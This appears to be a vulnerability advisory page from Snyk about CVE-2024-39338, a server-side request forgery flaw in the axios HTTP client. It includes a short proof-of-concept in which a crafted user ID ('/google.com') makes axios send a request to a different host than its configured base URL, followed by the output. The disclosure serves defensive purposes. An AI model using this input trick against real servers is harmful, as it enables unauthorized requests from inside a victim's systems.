Server-side Request Forgery (SSRF) Affecting org.webjars.bower:axios package, versions [1.3.2,]
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.08% (37th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JAVA-ORGWEBJARSBOWER-7675624
- published 11 Aug 2024
- disclosed 24 Jun 2024
- credit jeffhacks
Introduced: 24 Jun 2024
CVE-2024-39338 Open this link in a new tabHow to fix?
A fix was pushed into the master
branch but not yet published.
Overview
org.webjars.bower:axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.
PoC
const axios = require('axios');
this.axios = axios.create({
baseURL: 'https://userapi.example.com',
});
//userId = '12345';
userId = '/google.com'
this.axios.get(`/${userId}`).then(function (response) {
console.log(`config.baseURL: ${response.config.baseURL}`);
console.log(`config.method: ${response.config.method}`);
console.log(`config.url: ${response.config.url}`);
console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});
Output:
config.baseURL: https://userapi.example.com
config.method: get
config.url: //google.com
res.responseUrl: http://www.google.com/